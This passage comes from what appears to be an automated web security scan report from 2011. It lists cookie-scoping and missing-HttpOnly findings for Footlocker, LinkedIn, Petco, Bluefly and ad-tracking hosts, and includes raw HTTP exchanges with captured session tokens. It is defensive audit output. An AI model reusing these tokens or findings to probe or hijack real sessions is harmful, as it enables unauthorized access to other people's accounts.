BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

12.86. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSLC=web%2D22;domain=.footlocker.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.87. https://www.footlocker.com/account/default/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSLC=web%2D14;domain=.footlocker.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.88. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53c27,24783,53c27,18653,53bro,33114,00000,24782,53c27,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

12.89. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZpPi5xXPu3wAUyoFmEPiRoFWLLVIhVePrpPMOWXudLVqstNpbsiqk6:1305541361:db371bb2e2f7f4cf87c484a45d4fcbd618246dc6"; Version=1; Max-Age=1799; Expires=Mon, 16-May-2011 10:52:40 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:4068959828274013740"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:22:41 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Mon, 16-May-2011 10:53:58 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

12.90. http://www.petco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

12.91. http://www22.glam.com/cTagsImgCmd.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.glam.com
Path:	/cTagsImgCmd.act

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

glam_sid=115232130551023312111; expires=Wed, 15 May 2013 02:01:06 GMT; path=/; domain=.glam.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cTagsImgCmd.act?gname=ct&gvalue=pacsun&gtid=5000041577&gcmd=set&gdata=pacsun_rt HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17038/universal.html?page_name=ps_homepage&PS_Retargeting=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_cookie_sid=115232130551023312111; ctags=%3bct%3dpacsun

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^627fc31aa29ca9b1f0af2f412de3c2e5^115232130551023312111^1^446224^/^1x1^5000041577^31230390^-1^-1^-1^-1^0^0^804013055112669599^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^pacsun_rt
Set-Cookie: glam_sid=115232130551023312111; expires=Wed, 15 May 2013 02:01:06 GMT; path=/; domain=.glam.com;
Set-Cookie: glam_cookie_sid=1; expires=Sun, 15 May 2011 02:01:06 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=734
Date: Mon, 16 May 2011 02:01:06 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13. Cookie without HttpOnly flag set previous next
There are 180 instances of this issue:

http://action.media6degrees.com/orbserv/hbjs
http://core.bluefly.com/cm
http://eval.bizrate.com/js/survey_126457_1.js
http://login.dotomi.com/ucm/UCMController
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
https://secure.bhphotovideo.com/bnh/controller/home
https://secure.bluenile.com/926308692/bundles/core.js
https://secure.bluenile.com/984568475/css/footer.css
https://secure.bluenile.com/N1374326862/bundles/cart.css
https://secure.bluenile.com/N1991330425/js/navigation_flyouts_menu.js
https://secure.bluenile.com/N3371804/bundles/allpages.js
https://secure.bluenile.com/N3821919/bundles/footer.js
https://secure.bluenile.com/N518116487/bundles/allpages.css
https://secure.bluenile.com/N522719515/bundles/ga.js
https://secure.bluenile.com/N688855944/css/cart_print.css
https://secure.bluenile.com/accounts/account-sign-in.html
https://secure.bluenile.com/favicon.ico
https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm
http://t.p.mybuys.com/webrec/wr.do
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
http://tracking.searchmarketing.com/welcome.asp
https://www.acehardware.com/checkout/index.jsp
http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
http://www.bluefly.com/
http://www.brookstone.com/
http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html
http://www.footlocker.com/
http://www.footlocker.com/login/login.cfm
http://www.footlocker.com/login/login_forgotpassword.cfm
http://www.footlocker.com/login/login_form.cfm
https://www.footlocker.com/account/default.cfm
https://www.footlocker.com/account/default/
http://www.gnc.com/community/index.jsp%20%20
http://www.helzberg.com/account.do
http://www.linkedin.com/companyInsider
https://www.petsmart.com/coreg/index.jsp
http://www.restorationhardware.com/my-account/sign-in.jsp
https://www.restorationhardware.com/sitewide/includes/header/search.jsp
http://a.netmng.com/
http://a.rfihub.com/ca.gif
http://a.tribalfusion.com/i.cid
http://action.media6degrees.com/orbserv/hbpix
http://ad.trafficmp.com/a/bpix
http://ad.yieldmanager.com/pixel
http://ads.adbrite.com/adserver/vdi/684339
http://ads.lfstmedia.com/mark/CRITEO_INCL_US
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/f
http://adserver.veruta.com/track.fcgi
http://b.scorecardresearch.com/p
http://bluefly.com/
http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif
http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css
http://cdn.www.bluefly.com/media/css/mybluefly.css
http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif
http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif
http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif
http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif
http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258
http://cimg-1.restorationhardware.com/cm
http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1
http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1
http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1
http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1
http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1
http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1
http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1
http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll
http://community.petco.com/n/blogs/blog.aspx
http://community.petco.com/n/pfx/forum.aspx
http://core.bluefly.com/cm
http://customerappreciation.petco.com/cm
http://dis.us.criteo.com/dis/dis.aspx
http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925
http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://html.aggregateknowledge.com/iframe
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif
http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif
http://leadback.advertising.com/adcedge/lb
http://login.dotomi.com/ucm/UCMController
http://media.fastclick.net/w/tre
http://media.gnc.com/ipixel
http://media.gsimedia.net/ipixel
http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734
http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100
http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851
http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
https://ordering.ftd.com/signin/
http://phoenix.untd.com/TRCK/RGST
http://pix04.revsci.net/D05509/b3/0/3/noscript.gif
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.fetchback.com/serve/fb/ver
http://pixel.mathtag.com/data/img
http://pixel.mathtag.com/event/img
http://pixel.rubiconproject.com/tap.php
http://pixel.traveladvertising.com/Live/Pixel.aspx
http://px.steelhousemedia.com/pr
http://px.steelhousemedia.com/st
http://r.turn.com/r/beacon
http://rpt.footlocker.com/eluminate
http://rya.rockyou.com/ams/ptrck.php
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/hc/1402662/
http://sales.liveperson.net/hc/1402662/
http://sales.liveperson.net/hc/1402662/
http://sales.liveperson.net/hc/46281118/
http://sales.liveperson.net/hc/46281118/
http://sales.liveperson.net/hc/53965383/
http://sales.liveperson.net/hc/53965383/
http://sales.liveperson.net/hc/53965383/
http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png
http://segment-pixel.invitemedia.com/pixel
http://server.bhphotovideo.com/cm
http://srv.clickfuse.com/pixels/create.php
http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet
http://subscriptions.marvel.com/checkout/
http://sync.mathtag.com/sync/img
http://tags.mediaforge.com/if/50
http://trvlgrd.netmng.com/
http://uat.netmng.com/pixel/
http://web.aisle7.net/jsapi/1.0/content.js
http://www.acehardware.com/category/index.jsp
http://www.bhphotovideo.com/bnh/controller/home
http://www.bluefly.com/__ssobj/ard.png
http://www.bluefly.com/__ssobj/core.js
http://www.bluefly.com/favicon.ico
http://www.bluefly.com/myfly/forgot_password.jsp
http://www.bluefly.com/myfly/login.jsp
http://www.bluenile.com/
http://www.bluenile.com/build-your-own-diamond-ring
http://www.bluenile.com/channel-recommendations.html
http://www.bluenile.com/fbc/setStatus.html
http://www.brookstone.com/favicon.ico
http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html
http://www.brookstone.com/formhandlerservlet
http://www.brookstone.com/outdoor-living.html
http://www.brookstone.com/shoppingCart.jsp.vr
https://www.brookstone.com/favicon.ico
https://www.brookstone.com/formhandlerservlet
http://www.gnc.com/home/index.jsp
http://www.gnc.com/recommendationpixel/user.jsp
http://www.guitarcenter.com/
http://www.imiclk.com/cgi/r.cgi
http://www.orderhouse.com/
http://www.petco.com/
http://www.petco.com/Secure/Login.aspx
http://www.redcrossstore.org/
http://www.restorationhardware.com/
http://www.restorationhardware.com/content/promo.jsp
http://www.restorationhardware.com/sitewide/data/json/profile-status.jsp
https://www.restorationhardware.com/my-account/forgot-password.jsp
https://www.restorationhardware.com/my-account/register.jsp
https://www.restorationhardware.com/my-account/sign-in.jsp
https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp
https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp
http://www.toshibadirect.com/td/b2c/laptops.to
http://www22.glam.com/cTagsImgCmd.act
http://www26.orientaltrading.com/cm

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://action.media6degrees.com/orbserv/hbjs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://action.media6degrees.com
Path:	/orbserv/hbjs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT

(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

13.2. http://core.bluefly.com/cm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://core.bluefly.com
Path:	/cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TestSess3=50191305511370247364172;path=/
CoreID6=50191305511370247364172; path=/; expires=Fri, 15 May 2026 02:02:50 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?tid=6&ci=90039438&vn2=e4.0&st=1305510900223&vn1=4.2.9-AdTarget&ec=utf-8&pi=homepage&cg=HOME&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.bluefly.com/ HTTP/1.1
Host: core.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; bn_u=UNASSIGNED

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:50 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=50191305511370247364172; path=/; expires=Fri, 15 May 2026 02:02:50 GMT
Set-Cookie: TestSess3=50191305511370247364172;path=/
Location: http://data.coremetrics.com/cm?tid=6&ci=90039438&vn2=e4.0&st=1305510900223&vn1=4.2.9-AdTarget&ec=utf-8&pi=homepage&cg=HOME&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.bluefly.com/&cvdone=p&cmig=y
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

13.3. http://eval.bizrate.com/js/survey_126457_1.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://eval.bizrate.com
Path:	/js/survey_126457_1.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/
_data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510845%7Ctracker%3A%3Ahtcnt%3D2%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.4. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305511219021; Domain=.dotomi.com; Path=/
DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
DotomiNet=2$DjQqblZ1RXdFAmBdAgpyVAJHKDNEGQNFC15tVlFJZnhgewkJDQBKXRZSBwIZJRQWJA1ZfmhgWnZRIgFAaV0%3D; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.5. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQQTQTDSA=KIJKBNJBINEADJGLJOAHKHMI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=1402662&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; ASPSESSIONIDSQQDDBBA=PFKNNJDBKAJLDGDMHMKKDBLP; HumanClickACTIVE=1305541432474
If-Modified-Since: Fri, 13 May 2011 18:23:05 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:35:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 13 May 2011 18:23:05 GMT
Content-Length: 8868
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQQTQTDSA=KIJKBNJBINEADJGLJOAHKHMI; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 1402662
lpAddMonitorTag();
